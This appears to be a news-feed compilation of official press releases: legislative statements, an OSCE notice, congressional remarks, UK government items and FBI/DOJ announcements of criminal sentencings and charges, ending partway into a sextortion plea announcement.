“Congressman Langworthy’s bill takes aim at New York’s century-old Scaffold Law and its unjust absolute liability standard—a relic that saddles taxpayers with billions in extra costs while doing nothing to make jobsites safer. By replacing absolute liability with the same commonsense comparative-negligence standard, we can steer precious federal dollars toward rebuilding schools, roads, and affordable housing instead of lining trial-lawyer pockets. We applaud the Congressman’s leadership and stand ready to help get this done for workers, taxpayers and our economy,”saidMike Elmendorf, President & CEO of the Associated General Contractors of New York State.
“Congressman Langworthy’s bill is a long-overdue step toward restoring fairness and affordability in New York’s construction industry. The Scaffold Law’s absolute liability standard, which is unique to New York, inflates insurance costs by as much as 7%, directly driving up the price of affordable housing and infrastructure statewide. Reforming this outdated law is not just common sense, it’s essential to addressing our affordability crisis and ensuring that coveted federal dollars are spent building homes and communities, not fueling a broken legal system,”said Jolie Milstein, President and CEO, New York State Association for Affordable Housing.
“Representative Langworthy’s bill gives us a direct path to lowering costs on federally funded projects. Insurance costs in New York City are unreasonably high. Bringing down costs will mean more construction; more construction means more union construction jobs. Let’s get this much needed legislation across the finish line and bring more construction and construction jobs to New York,”saidElizabeth Crowley, President and CEO, Building Trades Employer Association.
“Congressman Langworthy’s bill will help in removing the effects of outdated laws on NYS’s highest in the nation insurance costs,”said Robert G. Wessels, Executive Director of the General Contractors Association of New York.“The savings obtained by decreasing the extreme cost paid by NY Contractors, for insurance on public works projects, can be used for further investment in critical infrastructure projects.”
“The National Electrical Contractors Association (NECA) strongly supports the Infrastructure Expansion Act of 2025 and applauds Congressman Nick Langworthy for his leadership in advancing this vital legislation. By ensuring that federal infrastructure projects are governed by a fair, comparative negligence standard rather than outdated absolute liability rules, this bill protects both contractors and property owners while preserving access to critical federal funding. On behalf of our several hundred electrical contractors across New York State, we thank Rep. Langworthy for standing up for the skilled professionals who power and build America’s infrastructure. This commonsense reform promotes safety, accountability, and much-needed investment in our nation’s roads, bridges, transit systems, and energy networks,”said Marco Giamberardino, SVP, Government and Public Affairs, National Electrical Contractors Association (NECA).
Source: Organization for Security and Co-operation in Europe – OSCE
Headline: OSCE on the RSNA’s adoption of the Law on financing of political organizations
SARAJEVO, 21 May 2025 – Following the adoption of the Law on financing of political organizations before the Republika Srpska National Assembly (RSNA), the OSCE Mission to BiH cautions authorities in Republika Srpska that the adoption of such a law risks (i) expanding the space for political corruption and creating unequal treatment between governing and opposition parties; and (ii) undermining the right of all political actors in Republika Srpska to pursue their political objectives through democratic means. Moreover, it does not establish adequate sanctions for violations of provisions of this law. The OSCE Mission to BiH calls on the RSNA to reassess its adoption.
Source: Federal Bureau of Investigation FBI Crime News (b)
ST. LOUIS – U.S. District Henry E. Autrey on Tuesday sentenced a man who admitted transporting a minor across state lines for sex to 230 months in prison.
Scott M. Arnold-Micke, 48, of Rolla, Missouri met the 17-year-old victim in 2021 and took him to Chicago, where they used drugs and engaged in sexual acts. Arnold-Micke engaged in drug use with the victim on an almost daily basis after Arnold-Micke moved from Sullivan, Missouri to Rolla.
Arnold-Micke, 48, pleaded guilty in January to one count of transportation of a minor to engage in a criminal sex act.
The case was investigated by the FBI and the Rolla Police Department with assistance from the Phelps County Sheriff’s Department. Assistant U.S. Attorney Dianna Edwards prosecuted the case.
“The FBI is unrelenting when it comes to protecting children,” said Special Agent in Charge Chris Crocker of the FBI St. Louis Division. “I commend those who brought this crime to light in order to get this child predator off the streets and in prison where he belongs.”
This case was brought as part of Project Safe Childhood, a nationwide initiative to combat the growing epidemic of child sexual exploitation and abuse launched in May 2006 by the Department of Justice. Led by U.S. Attorneys’ Offices and the Department of Justice Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state and local resources to better locate, apprehend and prosecute individuals who exploit children via the Internet, as well as to identify and rescue victims. For more information about Project Safe Childhood, please visit www.justice.gov/psc.
Source: United States House of Representatives – Congresswoman Marcy Kaptur (OH-09)
Full Hearing Recording Available Here
Washington, DC — Congresswoman Marcy Kaptur (OH-09), Ranking Member of the Energy and Water Development and Related Agencies Subcommittee, delivered the following remarks at the subcommittee’s fiscal year 2026 budget hearing for the Army Corps of Engineers (Civil Works) and the Bureau of Reclamation:
Thank you, Mr. Chairman. Good morning, everyone. Thank you for joining us. You build America, and we respect that. I welcome this opportunity to examine recent actions for the budget requests for the Corps of Engineers and the Bureau of Reclamation.
Thank you to our witnesses for devoting your lives to the nation and for joining us today. Your agencies play a critical role in developing the resources of our land while mindful of our obligations to future generations. Your vital work strengthens our economy, sustains life on Earth, and ensures public safety against the now constant onslaught of both increasing natural and human-caused disasters across our country, which is growing in population, headed to half a billion people. For example, the Corps played a vital role in clearing the waterways after the Key Bridge collapse in Baltimore. Thank you so much. And you are currently carrying out wildfire debris removal in Los Angeles County. Thank you for your exemplary service to our country. You hold us together, and all those who serve in the Corps and the Bureau.
The proposed cuts to the US Army Corps of Engineers and the Bureau of Reclamation are not just misguided — they are dangerous. Slashing their budgets and eroding their workforce endangers people’s lives and public safety, undermines economic growth, and weakens our national — the national welfare of the country — in the face of climate change.
Let’s start with the Corps of Engineers. Your work is not just about dams and levees. It’s about protecting lives and building America’s public infrastructure to manage flood control systems that safeguard our communities from the devastating effects of extreme weather. And we saw that this past week, with the terrible tornadoes from St. Louis and all surrounding states.
Along the shores of Lake Erie — the largest freshwater system in the world — we know what’s at stake. Erosion, rising lake levels, the problems with algal blooms, and increasingly violent storms threaten homes, businesses, and public assets. We cannot build a safe and a habitable environment for our growing population on shrinking budgets and shrinking staff.
In the Great Lakes region, modernization of projects like the Soo Locks are a prime example of long overdue investments that will turbocharge our economy. One hundred percent of America’s domestic iron ore passes through the Soo Locks. Think about how important that makes this strategic infrastructure.
Steel is a $500 Billion industry, it supports 123 thousand middle-class jobs, and I’m a strong advocate for reshoring the US steel industry and growing those numbers, but we have to modernize the shipping lanes and the waterways, and our ports, for today and the future. This project will ensure our heartlands’ maritime, industrial, agricultural, and commercial products are safe and efficiently moved.
Think about our region, it is the shortest distance by way of the Atlantic Ocean to the ports of northern Europe and beyond. Canada, the Great Lakes, and St. Lawrence Seaway hasten global trade, and President Eisenhower understood its place within our continental enterprise and global defense. So must we, as we witness the dawn of the new arctic age.
Similarly, the Brandon Road project, aims at arresting the potential enormous economic and environmental damage that can be unleashed by the invasion of the Asian carp. They could exterminate local and regional aquatic fish and species, and that would be devastating to our Great Lakes’ $7 Billion fishery and its $16 Billion recreational boating industry. These are astounding numbers.
The Corps of Engineers has a return on investment of over 200 to 1 in terms of economic benefits for every dollar invested. Ports, locks, and inland waterways maintained by the Corps are vital arteries for our very large nation and its commerce. In the Great Lakes region alone, these investments ensure that goods — from American steel to Ohio soybeans — can reach domestic and global markets. And cuts to this work would cause costly delays, limit our competitiveness, and harm local economies.
Now, to the Bureau of Reclamation. Though it serves primarily the Western United States, its importance cannot be overstated. The Bureau manages water supply for over 31 million Americans in the dry, and I guess I would say, coming from my part of the country drier, Western states, irrigates 10 million acres of farmland, and generates hydropower for millions of homes.
In this time of unprecedented drought and water stress, we must bolster — not diminish — Reclamation’s capacity to invest in sustainable water systems and innovative conservation technologies. Presidents Theodore Roosevelt and Herbert Hoover understood what development west of the Mississippi River would require. So must we.
Let’s be clear: disinvestment in the Corps and Bureau now will lead to higher costs down the road. Deferred maintenance becomes disaster recovery. Preventable failures become national emergencies.
I urge my colleagues on both sides of the aisle — this is not the time to retreat. It is time to lead. We must provide these agencies with the resources they need to protect our growing population, strengthen our economy, and safeguard our environment for generations to come.
Finally, I truly condemn the extreme politicization of critical Army Corps’ construction funding decisions, as we saw in last week’s work plan. It is yet another reminder that Congress must reclaim its authority over funding decisions by passing full-year appropriations bills.
Thank you, Mr. Chairman, and Members and our guests. I yield back.
Source: People’s Republic of China – State Council News
MADRID, May 21 (Xinhua) — Spain’s National Police have launched an investigation into the murder of a 52-year-old Ukrainian citizen who was shot dead on Wednesday morning outside the American School in the Madrid suburb of Pozuelo de Alarcon.
The incident occurred at around 09:15 local time /08:15 GMT/. Emergency medical personnel who arrived at the scene confirmed the man’s death from four gunshot wounds to the chest and one to the head. The injuries were assessed as “incompatible with life.”
As a precaution, classes at the school were immediately suspended. No other casualties were reported. Parents of the students told local media that the deceased was the father of one of the students at the school.
Although the investigation is still ongoing, preliminary police information suggests that the assailant was waiting for the victim on a motorcycle. Spanish radio station Cadena Ser identified the victim as Andriy Portnov, a former adviser to ex-Ukrainian President Viktor Yanukovych. –0–
Source: United Kingdom – Executive Government & Departments
Speech
The UK will keep supporting the Syrian people to rebuild their country and economy: UK statement at the UN Security Council
Statement by Ambassador James Kariuki, UK Deputy Permanent Representative to the UN, at the UN Security Council meeting on Syria.
We are encouraged to hear about the UN’s progress in strengthening engagement with the new Syrian Government.
I will make three points today.
First, we welcome President Trump’s announcement of lifting of US sanctions.
This positive step will create significant opportunity for economic recovery and development across Syria.
This follows the UK’s decision in April to lift our own sectoral sanctions on areas including trade, energy production and finance.
We remain steadfast in our commitment to supporting the Syrian people in rebuilding their country and economy.
Second, whilst economic recovery is vital, it must go hand in hand with an inclusive and peaceful transition that reconciles Syria’s diverse groups.
The UK was appalled by the attacks this month against the Druze community in Syria.
There can be no lasting peace or better future for Syrians unless all of Syria’s communities are protected and fully included in Syria’s political transition.
We call on all parties to reject violence, engage in dialogue and ensure the protection of civilians.
We note progress in reconciling Syrian groups into centralised structures.
Existing agreements, including those signed with the Syrian Democratic Forces and with the Druze leadership, should now be implemented in full.
We also call on Israel to refrain from actions that risk destabilising Syria and to respect Syria’s sovereignty and territorial integrity.
Third, as the new Syrian Government enters its third month, we look forward to seeing a clear timeline for next steps in the political transition.
We welcome and stand ready to support the newly announced National Commissions for Transitional Justice and for Missing Persons. Both will help Syria heal and move forward after years of suffering.
This political transition should be inclusive and allow Syrians to have a say in what comes next.
President, in conclusion, the UK stands ready to support the Syrian Government in their next steps on the path towards a more prosperous, peaceful and stable future that the Syrian people deserve.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)
KANSAS CITY, Mo. – A member of the Pagan’s Motorcycle Club pleaded guilty today before U.S. District Judge Greg Kays for his involvement in an armed assault and an attempted armed assault against members of rival motorcycle clubs.
Jeremiah Z. Hahn, also known as “Pass Out,” 42, of Cameron, Mo., pleaded guilty today to one count of assault with a dangerous weapon in aid of racketeering, one count of attempting to commit assault with a dangerous weapon in aid of racketeering, and one count of felon in possession of a firearm.
On May 30, 2022, Hahn and other members of the Pagan’s and their support club, assaulted a lone rival motorcycle gang member at a business in Grain Valley, Mo. In addition to fists, Hahn used an axe handle during the assault, causing physical injury to the victim.
On Sep. 3, 2022, Hahn and other members of the Pagan’s and their support club, travelled to Topeka, Ks., to carry out a revenge attack against another rival motorcycle gang. The plan was to “catch a stray” and “smash on sight” any rival member they saw. The Pagan’s were aware that the rival motorcycle gang were having an event in Topeka that day, and the plan was to use either an axe handle or a gun on one of the rival gang members. After arriving in Topeka, a rival member was spotted in a hotel parking lot. As Hahn, who was armed with a gun, prepared to shoot the rival, a disagreement occurred among members, and the group returned to the Kansas City area.
Following both events, Hahn and others present were awarded patches for their participation.
On May 3, 2023, Hahn was stoppedby a Missouri State Highway Patrol Trooper on eastbound Highway 36 in Dekalb County, Mo., for speeding. Hahn, who was riding a black, 2012 Harley Davidson motorcycle, had passed the trooper, traveling 98 mph in a 65-mph zone. Initially,Hahn attempted to flee the trooper and reached speeds ranging from 100-102 mph before stopping. Following Hahn’s arrest, the trooper discovered a Smith and Wesson, model M&P Shield, .40 caliber semi-automatic handgun, in Hahn’s front pants’ pocket. Hahn, who had felony convictions out of Oklahoma, Kansas, and Missouri, stated that he had stolen the gun approximately a week and a half earlier from a member of a rival motorcycle club in St. Joseph, Mo.
Under federal statutes, Hahn is subject to a sentence of up to twenty years in prison without parole. The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.
This case is being prosecuted by Assistant U.S. Attorneys Bradley K. Kavanaugh and Robert Smith. It was investigated by the FBI, the Independence, Mo., Police Department, the Blue Springs, Mo., Police Department, Homeland Security Investigations, and the Kansas City, Mo., Police Department.
Organized Crime and Drug Enforcement Task Force
This case is part of an Organized Crime Drug Enforcement Task Forces (OCDETF) operation. OCDETF identifies, disrupts, and dismantles the highest-level criminal organizations that threaten the United States using a prosecutor-led, intelligence-driven, multi-agency approach. Additional information about the OCDETF Program can be found at https://www.justice.gov/OCDETF.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)
KANSAS CITY, Mo. – A Kansas City, Mo., man was indicted by a federal grand jury today for robbing fourteen convenience stores at gunpoint. He also faces charges for attempting to rob another convenience store and illegally possessing a firearm.
Marquise L. North, 31, of Kansas City, Mo., was charged in a thirty-one count indictment returned by a federal grand jury in Kansas City, Mo.
Today’s indictment charges North with fourteen counts of Hobbs Act robbery, one count of attempted Hobbs Act robbery, fourteen counts of brandishing a firearm in furtherance of a crime of violence, and one count of being a felon in possession of a firearm.
The federal indictment alleges North committed the robberies between July 26, 2024, and Sep. 21, 2024. North is alleged to have brandished a firearm during each of the robberies.
Under federal law, it is illegal for anyone who has been convicted of a felony to be in possession of any firearm or ammunition. North has a prior felony conviction for unlawful possession of a firearm.
The charges contained in this indictment are simply accusations, and not evidence of guilt. Evidence supporting the charges must be presented to a federal trial jury, whose duty is to determine guilt or innocence.
Under federal statutes, North is subject to a sentence of up to life in federal prison without parole. Brandishing a firearm during a crime of violence carries a mandatory minimum sentence of seven years in federal prison without parole. The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.
This case is being prosecuted by Special Assistant U.S. Attorney Jessica L. Jennings. It was investigated by the FBI, Kansas City, Missouri Police Department, Raytown, Missouri Police Department, and Independence, Missouri Police Department.
Project Safe Neighborhoods
This case is part of Project Safe Neighborhoods (PSN), a program bringing together all levels of law enforcement and the communities they serve to reduce violent crime and gun violence, and to make our neighborhoods safer for everyone. On May 26, 2021, the Department launched a violent crime reduction strategy strengthening PSN based on these core principles: fostering trust and legitimacy in our communities, supporting community-based organizations that help prevent violence from occurring in the first place, setting focused and strategic enforcement priorities, and measuring the results.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)
SPRINGFIELD, Mo. – Two men from Springfield, Mo., were sentenced in federal court for their roles in a conspiracy to distribute large quantities of methamphetamine in the Springfield area.
Erik C. Foster, 43, was sentenced by U.S. District Judge Brian C. Wimes, to 215 months in federal prison without parole, to be followed by 5 years of supervised release. Foster pleaded guilty on Dec. 16, 2024.
Tilton Chase Tate, 41, was sentenced by U.S. District Judge Brian C. Wimes, to 146 months in federal prison without parole, to be followed by 5 years of supervised release. Tate pleaded guilty on October 15, 2024.
Foster and Tate were charged, along with other individuals, in a 24-count superseding indictment on July 25, 2023, for their roles in a drug conspiracy that lasted from Dec. 2020 to Oct. 2022.
Foster admitted to purchasing and delivering methamphetamine for other conspirators to distribute in Southwest Missouri. During the course of the conspiracy, law enforcement seized well over 50 grams of methamphetamine from members of the conspiracy.
According to court records, on Sep. 10, 2022, officers with the Republic, Mo. Police Department located two plastic bags containing at least 844 grams of methamphetamine from inside a speaker during a traffic stop where Foster was the passenger. Foster told officers that he had picked up the methamphetamine in Joplin and was taking it to Springfield to deliver it to a co-conspirator for distribution.
On Oct. 12, 2022, deputies with the Greene County, Mo., Sheriff’s Office seized a small plastic bag of what appeared to be black tar heroin, a backpack containing 70 grams of methamphetamine, and over $11,960 in cash from Foster during a traffic stop. During a post-Miranda interview, Foster told officers that he was taking the backpack to a co-conspirator for distribution and that he had made six or seven similar trips to deliver methamphetamine.
Tate admitted to possessing and distributing methamphetamine to others as part of the conspiracy.
On Oct. 19, 2021, during a traffic stop, a Springfield, Mo. Police Department (SPD) detective seized over 440 grams of methamphetamine from Tate.
On April 14, 2022, while executing a search warrant for Tate’s residence, SPD officers located a Ruger LCP 380 handgun and a Stoeger Arms, STR 9C 9mm handgun, as well as miscellaneous pills and suspected methamphetamine.
Later in April, during a post-Miranda interview, Tate admitted to purchasing the methamphetamine seized during the Oct. traffic stop from a co-conspirator. He estimated that he was selling a pound of methamphetamine each week.
This case is being prosecuted by Assistant U.S. Attorney Stephanie L. Wan. It was investigated by the Bureau of Alcohol, Tobacco, Firearms, and Explosives, the Federal Bureau of Investigation, the Greene County, Mo., Sheriff’s Office, the Missouri State Highway Patrol, the Republic, Mo., Police Department, and the Springfield, Mo., Police Department.
Organized Crime and Drug Enforcement Task Force
This case is part of an Organized Crime Drug Enforcement Task Forces (OCDETF) operation. OCDETF identifies, disrupts, and dismantles the highest-level criminal organizations that threaten the United States using a prosecutor-led, intelligence-driven, multi-agency approach. Additional information about the OCDETF Program can be found at https://www.justice.gov/OCDETF.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)
KANSAS CITY, Mo. – A Kansas City, Mo., man was sentenced in federal court today for his role in a conspiracy to distribute fentanyl, methamphetamine, and heroin and for possession of firearms in furtherance of that conspiracy.
Codi J. Monteer, 38, was sentenced by U.S. District Judge D. Greg Kays to 30 years in federal prison without parole.
On Oct. 8, 2024, Monteer pleaded guilty to one count of conspiracy to distribute fentanyl, methamphetamine, heroin, and marijuana; one count of maintaining a drug involved premises; one count of possession of firearms in furtherance of the drug conspiracy; and one count of being a felon in possession of firearms.
Monteer’s participation in the drug trafficking conspiracy lasted approximately one year and he was responsible for conspiring with others to distribute at least 124 kilograms of methamphetamine; 700 grams of fentanyl (powder and pills); and 1.58 kilograms of heroin. He was also in possession of several firearms used in furtherance of his drug trafficking.
On one occasion, in March 2021, Monteer led members of the Kansas Highway Patrol on a high-speed pursuit that reached speeds of approximately 145 miles per hour. The pursuit did not conclude until two of the tires came off Monteer’s vehicle. During the pursuit, drugs were thrown from the vehicle.
Monteer was an associate of Autumn Dicks, Ian Hazel, They Kelley, Marc Downs, and Jamison Hopson-Stephens. Those individuals have already been sentenced for their roles within the conspiracy. Monteer was also an associate of Davion Williams, Curtis Lewis, Daniel Anderson, and Aaron Dorsey in this conspiracy. Those individuals have all pleaded guilty and are awaiting sentencing.
This case is being prosecuted by Assistant U.S. Attorney Ashleigh A. Ragner. It was investigated by the Kansas City, Mo. Police Department, FBI, United States Postal Inspection Service, and the Kansas State Highway Patrol.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (c)
ALBUQUERQUE – A Shiprock man has been charged with assault with a dangerous weapon after he allegedly stabbed a man multiple times during an altercation near Shiprock.
According to court documents, on the night of April 19, 2025, Navajo Police Department officers responded to a 911 call reporting a stabbing in Shiprock, New Mexico. Officers located the victim who had sustained three stab wounds to his upper and lower back. The victim was transported to the hospital for emergency treatment.
An investigation led by the FBI and Navajo Nation Criminal Investigators revealed that Matthew Charley, 29, an enrolled member of the Navajo Nation, approached the victim and two witnesses. After a brief verbal exchange, the witnesses left the area, leaving Charley and the victim alone. When the witnesses returned a short time later, they found the victim had been stabbed. The victim identified Charley as his assailant.
Law enforcement collected witness statements, obtained video evidence, and reviewed surveillance footage that corroborated the description and movements of the suspect.
Screenshot of video showing Charley
Charley is charged with assault with a dangerous weapon and will remain in custody pending trial, which has not yet been scheduled. If convicted of the current charges, Charley faces 10 years in prison.
U.S. Attorney Ryan Ellison and Philip Russell, Acting Special Agent in Charge of the Federal Bureau of Investigation’s Albuquerque Field Office made the announcement today.
The Farmington Resident Agency of the Federal Bureau of Investigation’s Albuquerque Field Office investigated this case with assistance from the Navajo Nation Police Department and Navajo Department of Criminal Investigations. Assistant U.S. Attorney Amy Mondragon is prosecuting the case.
A criminal complaint is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
Source: United Kingdom – Executive Government & Departments
News story
Somerset Prepared Community Resilience Awards – nominations open
The Somerset Prepared partnership is now taking nominations for its annual awards which celebrate people who help their communities deal with emergencies.
Lucie Reader of Pitcombe and last years’s award winner
The Somerset Prepared partnership, including the Environment Agency, is searching for nominees for its next Community Resilience Awards.
The nomination window opened on Sunday 11 May in celebration of this month’s Somerset Day.
These awards recognise people and groups who have gone above and beyond to help their community be better able to deal with emergencies.
Awards will be presented in two categories:
Group award – for community organisations demonstrating exceptional emergency planning or preparedness
Individual award – for people who have made significant personal contributions to community resilience
Award winners will receive public recognition and vouchers for community activities. The awards will be presented by the Lord Lieutenant of Somerset, Mr Mohammed Saddiq at the annual Somerset Prepared Community Resilience Day, which will be held at Taunton Racecourse on Thursday, 15 October. At the free event, partners welcome local people to celebrate Somerset’s community emergency volunteers, with workshops, presentations, and equipment demonstrations.
The annual Somerset Prepared Community Resilience Day brings together key organisations including the Environment Agency, Somerset Rivers Authority and Somerset Council to help local communities strengthen their resilience against emergencies. Members of the public (or media) can reserve a place at the event by visiting Eventbrite.
Dr Bel Deering, community engagement officer for Somerset Rivers Authority, said:
The incredible work of volunteers who help their communities before and during emergencies deserves our gratitude.
They are our local heroes, and their courage and compassion deserve to be celebrated and shared as stories of hope for all of Somerset.
Last year’s individual winner was Lucie Reader of Pitcombe, whose exceptional leadership led to all homes in her community being flood protected for future emergencies. The group winner was Nunney Parish Council, whose councillors supported their community by proactively working with residents to improve their resilience to flooding.
Emma Giffard, flood resilience engagement advisor for the Environment Agency, said:
On behalf of all the Somerset Prepared partners, we extend our sincere thanks and warmly encourage both groups and individuals to submit their nominations for the awards.
Nominations for the award close on 15 September 2025.
Somerset Prepared is a multi-agency partnership working closely with communities to deliver advice, support and training to help enhance local resilience to emergencies. The partnership is made up of many organisations able to provide advice, guidance and support to help you develop local initiatives that enhance resilience to emergencies.
Source: Federal Bureau of Investigation (FBI) State Crime Alerts (c)
BUFFALO, N.Y. – U.S. Attorney Michael DiGiacomo announced today that Waleed Abughanem, 33, of Lackawanna, NY, who was convicted of misprision of felony, was sentenced to serve 36 months in prison by U.S. District Judge John L. Sinatra, Jr.
Assistant U.S. Attorneys Charles M. Kruly and Maeve E. Huggins, who handled the case, stated that Abughanem is the son of Khaled Abughanem and the brother of Adham Abughanem. On September 8, 2021, Khaled and Adham Abughanem flew from Buffalo, NY, to Guadalajara, Mexico to kidnap Victim 1, who is the daughter of Khaled and the sister of Adham and Waleed. Between September 10, 2021, and April 6, 2023, Waleed, Khaled and Adham Abughanem conspired to transport Victim 1 from the Western District of New York to Cairo, Egypt, and then to Sanaa, Yemen, where they confined Victim 1 for approximately 16 months with the purpose of marrying her to a man not of her choosing.
Waleed Abughanem knew Victim 1 was being held involuntarily, and during some of this period, he was present in Yemen. When he was not present in Yemen, Waleed Abughanem instructed his wife to monitor and supervise Victim 1. In December 2022, Waleed Abughanem traveled from Yemen to the United States. When questioned by U.S. Customs and Border Protection as to the whereabouts of his siblings, Waleed Abughanem told the CBP Officer that the Victim was in the United States. By making a false statement, Waleed Abughanem concealed that Victim 1 had been kidnapped and was being involuntarily held in Yemen.
Khaled and Adham Abughanem were previously convicted by a federal jury at trial and are awaiting sentencing.
Waleed Abughanem’s sentencing is the result of an investigation by the Federal Bureau of Investigation, under the direction of Special Agent-in-Charge Matthew Miraglia, and the U.S. Department of State’s Diplomatic Security Service, under the direction of Diplomatic Security Director Carlos Matus and Deputy Assistant Secretary Paul Houston. Additional assistance was provided by the Lackawanna Police Department, under the direction of Chief Mark Packard, Customs and Border Protection, under the direction of Director of Field Operations Rose Brophy, and CPB in Boston, Massachusetts.
DEL RIO, Texas – A federal grand jury in Del Rio returned an indictment charging a Mexican national with four counts related to methamphetamine trafficking.
According to court documents, Veronica Sanchez-Pineda, 46, of Piedras Negras, Coahuila, Mexico, approached the Eagle Pass Port of Entry in a pickup truck on April 20, allegedly giving Customs and Border Protection officers a negative declaration for contraband including narcotics. A secondary inspection allegedly resulted in the discovery of a crystal-like substance inside an auxiliary tank in the bed of the truck. The liquid was extracted and resulted in a positive test result for the properties of methamphetamine, a criminal complaint alleges. The total approximate weight of the alleged narcotic was 521.03 kg.
The criminal complaint also alleges that Sanchez-Pineda consented to a search of her cell phone, which contained a text message about a “job” in Eagle Pass as well as screenshots of money transfers between the defendant and another individual. Sanchez-Pineda allegedly admitted to being involved in illegal activity regarding the contents of the auxiliary tank and that she was being compensated in Mexican Pesos.
Sanchez-Pineda is charged with one count of conspiracy to possess with intent to distribute methamphetamine; one count of possession of methamphetamine with intent to distribute; one count of conspiracy to import methamphetamine; and one count of importation of methamphetamine. She was arrested and made her initial court appearance April 24 before U.S. Magistrate Judge Matthew H. Watters of the U.S. District Court for the Western District of Texas. If convicted, Sanchez-Pineda faces 10 years to life in prison and up to a $10 million fine. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.
Acting U.S. Attorney Margaret Leachman for the Western District of Texas made the announcement.
Homeland Security Investigations is investigating the case.
Assistant U.S. Attorney Warsame Galaydh is prosecuting the case.
This case is part of Operation Take Back America, a nationwide initiative that marshals the full resources of the Department of Justice to repel the invasion of illegal immigration, achieve the total elimination of cartels and transnational criminal organizations (TCOs), and protect our communities from the perpetrators of violent crime. Operation Take Back America streamlines efforts and resources from the Department’s Organized Crime Drug Enforcement Task Forces (OCDETFs) and Project Safe Neighborhood (PSN).
An indictment is merely an allegation and all defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
CHARLOTTE, N.C. – Dujuan Marquise McNeil, 39, of Charlotte, was sentenced yesterday to 10 years in prison followed by three years of supervised release for illegal possession of a firearm after he assaulted two U.S. Postal Service mail carriers on the same day, announced Russ Ferguson, U.S. Attorney for the Western District of North Carolina.
Rodney Hopkins, Inspector in Charge of the Atlanta Division of the U.S. Postal Inspection Service (USPIS), which oversees Charlotte, joins U.S. Attorney Ferguson in making today’s announcement.
“My office will continue to aggressively prosecute those that threaten or harm our postal workers,” said U.S. Attorney Ferguson. “Postal workers are hard-working Americans that are vital to our way of life and essential to our system of commerce.”
“A core mission of the U.S. Postal Inspection Service is to provide a safe environment for Postal employees and the American public. Illegal weapons threaten the safety of all our communities,” said Inspector in Charge Hopkins. “We extend our utmost appreciation to our law enforcement partners and the U.S. Attorney’s Office in the Western District of North Carolina for supporting our mission and bringing this investigation to a successful conclusion.”
According to court records, on June 1, 2023, McNeil, used firearms to threaten two U.S. Postal Service mail carriers. In both instances, McNeil used his vehicle to block a mail truck, before threatening the carrier inside with his guns. McNeil believed someone with the post office stole an unidentified item from his package. McNeil also went to a local post-office complain about the alleged theft. Clerks at that office reported that McNeil stated he would kill whichever carrier was responsible for the alleged theft.
During the investigation, law enforcement determined the McNeil had multiple prior criminal convictions, including Possession of a Firearm by a Felon, Discharge of a Weapon into Occupied Property, and Domestic Violence Protective Order Violation, and was prohibited from possessing firearms.
On June 14, 2023, a federal search warrant was executed at McNeil’s residence, where law enforcement found and seized multiple firearms, including: three 9mm semi-automatic pistols (one fitted with an extended magazine); a Polymer 80 9mm semi-automatic pistol (commonly referred to as a “ghost gun”) with an extended magazine; an AR15 semi-automatic rifle; multiple magazines; and nearly 300 rounds of ammunition.
On October 30, 2024, McNeil pleaded guilty to possession of a firearm by a convicted felon. He is currently in federal custody and will be transferred to the custody of the Federal Bureau of Prisons.
In making today’s announcement U.S. Attorney Ferguson commended USPIS for their work in this investigation and thanked the Bureau of Alcohol, Tobacco, Firearms and Explosives and the Charlotte Mecklenburg Police Department for their assistance.
The U.S. Attorney’s Office in Charlotte prosecuted the case.
AUSTIN, Texas – An Austin man was sentenced in a federal court in Austin to 144 months in federal prison for one count of felon in possession.
According to court documents, Steven Moreno Briseno, 38, was arrested by Austin Police when he surrendered during a barricaded standoff at his family’s residence on Nov. 30, 2023. Briseno had allegedly been under the influence of methamphetamine and got into an altercation with his wife, physically assaulting her and then fleeing on foot when officers arrived in response to a 911 call.
Briseno ran into a vacant apartment across the street then sprinted back to his residence, where he barricaded himself inside. Briseno’s aggressive behavior escalated as he refused the officers’ commands to exit the residence, made comments about arming himself, and threatened to start shooting if the officers did not back away from his residence. Officers observed Briseno fashioning a tripod through a window and mounting a long rifle on top. He was also seen smoking from a glass pipe that resembled a meth pipe while he loaded numerous rounds into rifles, handguns, and at least one shotgun. Additionally, officers watched Briseno exit the residence with a gun in his hand while wearing a camouflaged tactical vest.
When APD SWAT arrived on the scene, Briseno was instructed to exit the residence with his hands up and empty. Subsequently, he fired at least one round from one of his firearms from inside the residence to an unspecified location outside the residence. After several minutes of speaking via loudspeaker, Briseno surrendered to APD. Inside the residence, officers located numerous firearms, loaded magazines, and boxes of ammunition in plain view, including on top of the kitchen table and staged near the front door and multiple windows in the front of the house.
Briseno had previously been convicted of multiple felonies, including burglary on Nov. 30, 2022. He pleaded guilty to one count of felon in possession of a firearm on Jan. 15, 2025.
Acting U.S. Attorney Margaret Leachman for the Western District of Texas made the announcement.
The Bureau of Alcohol, Tobacco, Firearms and Explosives and the Austin Police Department investigated the case.
Assistant U.S. Attorney Grant Sparks prosecuted the case.
Greenbelt, Maryland – Chase William Mulligan, 28, of Silver Spring, Maryland, pled guilty to two counts of producing child sexual abuse material in federal court. The charges are in connection with a scheme in which he met young girls through social media and internet chat rooms and eventually “sextorted” them.
Specifically, through the scheme, Mulligan coerced at least 108 girls — ranging from ages 5-17 — to send him sexually explicit photographs and videos of themselves. When the girls told him they no longer wanted to send him sexually graphic images, Mulligan threatened to post the images online or come to their house.
Kelly O. Hayes, U.S. Attorney for the District of Maryland, announced the guilty plea with Special Agent in Charge William J. DelBagno of the Federal Bureau of Investigation (FBI) – Baltimore Field Office.
